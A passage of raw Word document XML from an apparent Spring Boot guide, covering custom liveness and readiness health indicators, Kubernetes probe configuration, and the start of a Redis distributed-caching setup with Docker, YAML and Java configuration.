    <w:p w14:paraId="20699A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boot.actuate.health.ReadinessStateHealthIndicator;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5CB27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import org.springframework.stereotype.Component;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1536E1F0" w14:textId="77777777" w:rsidR="00204453" w:rsidRPr="00204453" w:rsidRDefault="00204453" w:rsidP="00204453">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="758666D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402417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ReadinessHealthIndicator extends ReadinessStateHealthIndicator {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B3E6A1" w14:textId="77777777" w:rsidR="00204453" w:rsidRPr="00204453" w:rsidRDefault="00204453" w:rsidP="00204453">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67A37F8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06617F5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tected Health getHealth(boolean includeDetails) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655E359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readiness logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3BDD8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Readiness", "Application is ready").build();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15ADF91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4E3A46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CB7C661" w14:textId="77777777" w:rsidR="00204453" w:rsidRPr="00204453" w:rsidRDefault="00204453" w:rsidP="00204453">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2142404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omponent</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05A95AE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public class CustomLivenessHealthIndicator extends LivenessStateHealthIndicator {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D115211" w14:textId="77777777" w:rsidR="00204453" w:rsidRPr="00204453" w:rsidRDefault="00204453" w:rsidP="00204453">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C864393"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Override</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DB195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rotected Health getHealth(boolean includeDetails) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3169297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ustom liveness logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A69109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turn Health.up().withDetail("Liveness", "Application is alive").build();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAEB14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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D38F4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t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A2CE0F3"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745C5">
          <v:rect id="_x0000_i2792" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BEA6AB"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6. Kubernetes Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0CA02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Define health checks in your Kubernetes deployment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E699E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piVersion: apps/v1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FA871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ind: Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1CF7B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metadata:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3458CF9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name: spring-boot-app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E20F46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spec:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614DDD4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plicas: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032DD06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elector:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA16F7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matchLabels:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3EE75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 spring-boot-app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3E49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lastRenderedPageBreak/>
        <w:t xml:space="preserve">  template:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F95A8B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metadata:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B76FE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abels:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1BC0C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app: spring-boot-app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46BF1BA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spec:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C94F0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containers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EB4EF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name: spring-boot-app</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26426E7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mage: spring-boot-app:latest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D95BA2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s:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="541356F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 containerPort: 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FC11A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livenessProbe:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553F12C8"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ttpGet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC062F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ath: /actuator/health/liveness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A07AB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 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218F8230"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itialDelaySeconds: 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1982338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eriodSeconds: 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32FF451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readinessProbe:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060B548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httpGet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB6CDEE"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ath: /actuator/health/readiness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F070C36"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ort: 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6C4B0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initialDelaySeconds: 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218857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            periodSeconds: 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068A823D"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C50C9">
          <v:rect id="_x0000_i2793" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB32066"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7. Deploy the Application on Kubernetes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EEB26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Apply the configuration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243F3951"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apply -f deployment.yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2886A3B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pod status:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5044057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get pods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C927979"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View logs to check health:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4B0F9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logs &lt;pod-name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA1FEA1"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40E08">
          <v:rect id="_x0000_i2794" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB23A2F"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8. Verifying Health Check Logs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="196EF2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health status from within the pod:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506527C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exec -it &lt;pod-name&gt; -- curl http://localhost:8080/actuator/health</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B46C9D"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Check the health probe status:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BB7A305"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kubectl describe pod &lt;pod-name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF5C471"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1B08AC">
          <v:rect id="_x0000_i2795" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="157E03C9"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9. Handling Unhealthy States</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E63FC9B"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When the health check fails:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDE7DD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Kubernetes restarts the pod if the </w:t>
      </w:r>
      <w:r w:rsidRPr="00204453">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>liveness probe</w:t>
      </w:r>
      <w:r w:rsidRPr="00204453">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> fails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8E1EB4"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The pod remains in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00204453">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>not ready</w:t>
      </w:r>
      <w:r w:rsidRPr="00204453">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> state if the </w:t>
      </w:r>
      <w:r w:rsidRPr="00204453">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>readiness probe</w:t>
      </w:r>
      <w:r w:rsidRPr="00204453">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> fails.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3CE6C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You can customize the failure thresholds and delays in the Kubernetes configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="146E8F8E" w14:textId="77777777" w:rsidR="00204453" w:rsidRPr="00204453" w:rsidRDefault="00000000" w:rsidP="002044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7810">
          <v:rect id="_x0000_i2796" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7085E897" w14:textId="77777777" w:rsidR="00204453" w:rsidRPr="00204453" w:rsidRDefault="00204453" w:rsidP="00204453">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204453">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>10. Best Practices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C38D6E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Keep Probes Lightweight:</w:t>
      </w:r>
      <w:r w:rsidRPr="00204453">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Avoid heavy computations or complex logic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9A157F"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Separation of Concerns:</w:t>
      </w:r>
      <w:r w:rsidRPr="00204453">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use different endpoints for liveness and readiness.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313762FC"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Graceful Shutdown:</w:t>
      </w:r>
      <w:r w:rsidRPr="00204453">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ensure the readiness probe reflects when the app is not ready during shutdown.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DD19B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Probe Timeouts:</w:t>
      </w:r>
      <w:r w:rsidRPr="00204453">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Set appropriate timeouts and failure thresholds based on the application load.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213055DA"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b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Consistent Status Codes:</w:t>
      </w:r>
      <w:r w:rsidRPr="00204453">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Return 200 OK for healthy and 503 Service Unavailable for unhealthy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="565A53E7" w14:textId="77777777" w:rsidR="00204453" w:rsidRPr="00204453" w:rsidRDefault="00204453" w:rsidP="00204453">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00204453">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">By integrating </w:t>
      </w:r>
      <w:r w:rsidRPr="00204453">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Boot Actuator</w:t>
      </w:r>
      <w:r w:rsidRPr="00204453">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:r w:rsidRPr="00204453">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kubernetes health checks</w:t>
      </w:r>
      <w:r w:rsidRPr="00204453">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, you ensure that your containerized application is robust, resilient, and easily maintainable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6246506F" w14:textId="77777777" w:rsidR="00187C12" w:rsidRDefault="00000000" w:rsidP="00187C12">
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="1E2B1CBA">
          <v:rect id="_x0000_i2797" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E88A005" w14:textId="5D104CAC"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0" w:name="_Toc197867904"/>
      <w:r w:rsidRPr="006D4D99">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How do you implement the distributed caching like Redis in Spring Boot application and manage cache mechanism strategy</w:t>
      </w:r>
      <w:r w:rsidR="00187C12" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="690"/>
    </w:p>
    <w:p w14:paraId="43EFB2DD" w14:textId="5500DA83" w:rsidR="002E2438" w:rsidRPr="002E2438" w:rsidRDefault="002E2438" w:rsidP="000F584B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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To implement distributed caching with </w:t>
      </w:r>
      <w:r w:rsidRPr="002E2438">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Redis</w:t>
      </w:r>
      <w:r w:rsidRPr="002E2438">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a Spring Boot application, follow these steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DAD9F80"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925B1D2">
          <v:rect id="_x0000_i2798" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CCDBD2"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1. Why Use Redis for Caching?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1619FDD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Fast Data Access:</w:t>
      </w:r>
      <w:r w:rsidRPr="002E2438">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> In-memory storage for quick data retrieval.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2B6F2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calability:</w:t>
      </w:r>
      <w:r w:rsidRPr="002E2438">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Suitable for distributed caching across multiple nodes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="635318E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TTL Support:</w:t>
      </w:r>
      <w:r w:rsidRPr="002E2438">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Efficient cache eviction with time-to-live.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05EF66E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Data Structures:</w:t>
      </w:r>
      <w:r w:rsidRPr="002E2438">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Supports strings, hashes, lists, sets, and more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4B97F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Integration:</w:t>
      </w:r>
      <w:r w:rsidRPr="002E2438">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Easy to integrate with Spring Boot using spring-boot-starter-data-redis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B11B5BA"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3A51F">
          <v:rect id="_x0000_i2799" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="41754FA0"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2. Setup Redis in Spring Boot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7C89A9"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1: Add Dependencies (Gradle)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60B9FEB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dependencies {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6EC3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data-redis'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="665D1DB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cache'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D4A28A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implementation 'org.springframework.boot:spring-boot-starter-web'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4105B44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12E2EBEE"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827C50">
          <v:rect id="_x0000_i2800" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2681C9E7"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2: Install and Run Redis (Docker)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2B5E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docker run --name redis-cache -d -p 6379:6379 redis:alpine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D4A466"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7F20A">
          <v:rect id="_x0000_i2801" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B39F5E"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tep 3: Configure Redis in Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F5A97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application.yml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1273560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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB7566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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7A98C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ype: redis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5344627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dis:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018223F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host: localhost</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AB293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ort: 6379</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5959762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imeout: 6000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5815B01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redis.time-to-live: 60000 # 1 minute TTL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531270D3"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3D2F77">
          <v:rect id="_x0000_i2802" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="057F2726"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3. Enable Caching in Spring Boot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0D7DC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Main Application Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729EEBC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BootApplication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C7D2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EnableCaching</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DE2CAD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RedisCacheApplication {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308D8F1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static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B7940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SpringApplication.run(RedisCacheApplication.class, args);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB6207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807515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4BC92D1C"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Cache Configuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD45A3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onfiguration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1096086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RedisConfig {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66CC831F" w14:textId="77777777" w:rsidR="002E2438" w:rsidRPr="002E2438" w:rsidRDefault="002E2438" w:rsidP="002E2438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ECF2F3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Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D52A9C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RedisConnectionFactory redisConnectionFactory() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6748AAA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new LettuceConnectionFactory("localhost", 6379);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C7EE0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3603A48A" w14:textId="77777777" w:rsidR="002E2438" w:rsidRPr="002E2438" w:rsidRDefault="002E2438" w:rsidP="002E2438">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44CC10B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Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AAC48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RedisTemplate&lt;String, Object&gt; redisTemplate(RedisConnectionFactory connectionFactory) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29424CC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disTemplate&lt;String, Object&gt; template = new RedisTemplate&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F88510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ConnectionFactory(connectionFactory);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9A22A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KeySerializer(new StringRedisSerializer());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432F82A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emplate.setValueSerializer(new GenericJackson2JsonRedisSerializer());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B35C4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template;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE7674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07711E8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lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19ADDD51"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2CD28">
          <v:rect id="_x0000_i2803" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E103AF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4. Implementing Caching in a Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB263E8"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Employee Entity</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AF76C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 implements Serializable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6C6C4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Long id;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3983FF7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ring name;</w:t>
